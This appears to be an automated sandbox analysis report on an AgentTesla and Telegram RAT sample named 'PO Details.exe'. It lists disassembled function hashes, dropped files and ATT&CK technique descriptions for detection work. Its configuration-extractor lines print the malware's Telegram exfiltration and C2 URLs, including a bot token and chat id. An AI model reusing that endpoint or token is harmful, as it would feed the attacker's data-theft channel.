Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5b0f2dec0bae297b5351630951438f6ac93dd112bfb7ef9f3f2fa51da9cffb5
Instruction ID: 9891a6a49b15d0f09971fc40b3b3a7f697500c23e8696cde20679c95c34be7a2
Opcode Fuzzy Hash: d5b0f2dec0bae297b5351630951438f6ac93dd112bfb7ef9f3f2fa51da9cffb5
Instruction Fuzzy Hash: F0115E38B046158FDF10DB64C854A5EB7B1FF96315F1248AAD546DB351DB30DD00CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00A46878 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: addef219d1d876ce2360f9f877ac54474520c290acaa24cb4a4d5c6f93cd8027
Instruction ID: c47a722d517fa4b059270d6c9b40d55936d1972087a1d0e0d150c735e7165959
Opcode Fuzzy Hash: addef219d1d876ce2360f9f877ac54474520c290acaa24cb4a4d5c6f93cd8027
Instruction Fuzzy Hash: 80114FB5E042199FDB01DFA9D844AEFBBF9FF89350F14802AE425E3240D7749A15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E628 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b873d22a7c3a434fd742c645d9ab1f981fd61a72937483d20231d02f18b2a7ca
Instruction ID: 73148f6fb94e4d34912a2a699102405dfe82a3deededdce1730bdbe767fc5786
Opcode Fuzzy Hash: b873d22a7c3a434fd742c645d9ab1f981fd61a72937483d20231d02f18b2a7ca
Instruction Fuzzy Hash: 6F111838B045158FDF20DB68C854AAEB3F5FB99315F024866D916DB360DB30ED04CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1CFFD3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.14013388806.000000001CFFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CFFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cffd000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d16fd6ef3c59bac4bcbfe4b1eba0b5f6faba6c57df4d65b16faaa9ed7d95a004
Instruction ID: 29728be03d4e16e97cdc993e5110b49e6fbe0cfed4f560084a00180f63902ceb
Opcode Fuzzy Hash: d16fd6ef3c59bac4bcbfe4b1eba0b5f6faba6c57df4d65b16faaa9ed7d95a004
Instruction Fuzzy Hash: FC119376504280DFDB05CF14D5C4B16BF72FB84324F24C6A9D9494B666C33AE456CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1D00E32B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.14013551940.000000001D00D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D00D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d00d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 708bdd1655e61e3f2def2fbebfbeab18fc5b8cd9c819120065320a6899cc5164
Instruction ID: 5426e18a66e12b51f05df62fab4b199fb9cc0c8abc793ad1abcc06463cdd5354
Opcode Fuzzy Hash: 708bdd1655e61e3f2def2fbebfbeab18fc5b8cd9c819120065320a6899cc5164
Instruction Fuzzy Hash: D5119D75504284EFEB01CF14D9C4B16FFB2FB84314F24C6AAD8494B656C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A4CB48 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9285cc90da88d17c7c7042de7a821d71dac81477466189df99983511d09c29e
Instruction ID: ed2b646c92adc1fdd91d0d6f1f204f90c2f536d932b5364c16a95c2edc09045e
Opcode Fuzzy Hash: f9285cc90da88d17c7c7042de7a821d71dac81477466189df99983511d09c29e
Instruction Fuzzy Hash: AC112E35F00629CFCB84DF78C898A9EB7F1FB8C6617118529D819E3300EB3199168FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A42688 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff799a9fce18c67b44992a3d1b59802d23385f1eb14d132841883f2e375d64d3
Instruction ID: 460dc3fc732c87b0212fac212e0ce9765f4131156a8f997e50deb706e62e060d
Opcode Fuzzy Hash: ff799a9fce18c67b44992a3d1b59802d23385f1eb14d132841883f2e375d64d3
Instruction Fuzzy Hash: 5501F9367001156BCB059F599800FEF7BABEFC8790B198029F515C7254CE71DC1197E6

Uniqueness

Uniqueness Score: -1.00%

Function 00A4EC19 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3a513305a53bbe74a6da8781547f91151cb75b211cb6167af4a65a610b0839
Instruction ID: 34b6d2a3f8668bf21e13671db4a5609335f5f2da8875cfe015aedbd30b4a7baa
Opcode Fuzzy Hash: fd3a513305a53bbe74a6da8781547f91151cb75b211cb6167af4a65a610b0839
Instruction Fuzzy Hash: D3019A35D043A88FCB109FB4C88D69EBFF0EB45356F00896AE8429B245DB305409CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00A42682 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 289ada926e927e849c61aa6896f23730d02104f83a6da0fec9e2f1d18f18c9a7
Instruction ID: 9aee345ccf5fb9f394706ef0826e6194260c908c5ff2c0fcf0b1f137ee92032e
Opcode Fuzzy Hash: 289ada926e927e849c61aa6896f23730d02104f83a6da0fec9e2f1d18f18c9a7
Instruction Fuzzy Hash: 8DF0C276A001186FDB018F959C10FEF7BABEFC8791F188029F925C7240DA71CD129BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4BED0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96895e733e83f960eb477a0dac2d6f15947da22cd259032c1d3d0d3faec080c8
Instruction ID: e2f1eeb5876d4e7bb56e7fbd5756e505d066ac1acf4ffb5e00d453f59e2068f2
Opcode Fuzzy Hash: 96895e733e83f960eb477a0dac2d6f15947da22cd259032c1d3d0d3faec080c8
Instruction Fuzzy Hash: 44F03776E101195F8B449AA868495EE7BF9FB88721B11006BE51DE3201D7315A168FE1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4BEE0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48cc4a26e9029ae52db95664251c15bf812f99218acc46110139ba214fc63949
Instruction ID: 040658d122bf8384261aa934655b5759b582f3c8cdd64a054447d0235931734b
Opcode Fuzzy Hash: 48cc4a26e9029ae52db95664251c15bf812f99218acc46110139ba214fc63949
Instruction Fuzzy Hash: A6E01275E101299F87549BAD98485EF7BF9EB88261B150076E51DD3200E63089118BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E5D8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 248c4cf42bdcdc3e955696050fc87464763d6cffdeee332e6fe6d9053c739dc9
Instruction ID: 0f1884806cb434e4a924da2230bbc4ac78f8b8dd47ebd108d56f8d4b15c1e76a
Opcode Fuzzy Hash: 248c4cf42bdcdc3e955696050fc87464763d6cffdeee332e6fe6d9053c739dc9
Instruction Fuzzy Hash: B5E0863010D3908FCB265734856A2163B64EBD7318F614CABE441CF143D216CC15C753

Uniqueness

Uniqueness Score: -1.00%

Function 00A493D1 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59a5ede38aa3583c28b5b2d5f6054e451dbd5f207120a05cfdb638f51b72ed55
Instruction ID: e1af54a862ba64c6de3ac531d991219147af32fa1a6ec27f38c1bee1eb7d2e4e
Opcode Fuzzy Hash: 59a5ede38aa3583c28b5b2d5f6054e451dbd5f207120a05cfdb638f51b72ed55
Instruction Fuzzy Hash: 6BD0E279F002348BCB58DB75E8C82EEB7B2FBC8256B10806AD01A92202CF3499168F00

Uniqueness

Uniqueness Score: -1.00%

Function 00A4E5E8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b3b4e99f0b5ed4f2aa1cea112c8d1bdd486ccc814840e240ba663dbcaa0ba70
Instruction ID: 9fe46618c88296131521260399085ad84c6e11a3d383f6037730752167e1ac7b
Opcode Fuzzy Hash: 1b3b4e99f0b5ed4f2aa1cea112c8d1bdd486ccc814840e240ba663dbcaa0ba70
Instruction Fuzzy Hash: CAD012346102248BDB749B3886A97263359F7EA32CF600C35E406CB240E727DC40CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A46B43 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: decb4e2dd0da9d73af2dfb78a681f666e7a068ea778878c1a791f4519efda159
Instruction ID: 2618929e552b7e97073c3b842c1929e8131af775232279ac77e7b835dd4abe53
Opcode Fuzzy Hash: decb4e2dd0da9d73af2dfb78a681f666e7a068ea778878c1a791f4519efda159
Instruction Fuzzy Hash: 2ED0A735E01018C74B00ABC5E0510DCB379EEC86787108397D934625C0D7314A598592

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A42FA8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;k, xrefs: 00A42FBE
\;k, xrefs: 00A42FDA
\;k, xrefs: 00A42FE6
\;k, xrefs: 00A42FB4

Memory Dump Source

Source File: 0000000B.00000002.13994174247.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a40000_CasPol.jbxd

Similarity

API ID:
String ID: \;k$\;k$\;k$\;k
API String ID: 0-2739306711
Opcode ID: 5da5933cd193249b9e989a304763cc2d01349a690d2e0a10421ba357876496c8
Instruction ID: dd1f67678348a4571721ff640f7de0609899c9dcc0f05d6747ffd80314d80ad2
Opcode Fuzzy Hash: 5da5933cd193249b9e989a304763cc2d01349a690d2e0a10421ba357876496c8
Instruction Fuzzy Hash: 41018F3A7004118F8B248F6DC440A2977F6AFD97A07A6426AF505CB374DE72DC41D7A1

Uniqueness

Uniqueness Score: -1.00%

Source: CasPol.exe.7452.10.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5270570406", "Chat URL": "https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocument"}
Source: CasPol.exe.7460.11.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendMessage"}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_2030B024 CryptUnprotectData,		11_2_2030B024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_2030B5C0 CryptUnprotectData,		11_2_2030B5C0

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO Details.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Threatname: Telegram RAT

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Bilfragmenteringsanlgs209\Buskmndene\Injectors\Cunts\timeydelserne.Med

C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Indbildte\Jvnfrelse\Ozonizations\Forskelsbehandlingen9.Unm

C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Junkere\lang-1038.dll

C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
PO Details.exe

Function 004034C5 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Function 004055B8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 6E491B5F Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Function 00405B23 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 004021A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Function 0040676F Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 00403E8E Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 00403AE0 Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00403015 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 0040644E Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 209
stringCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre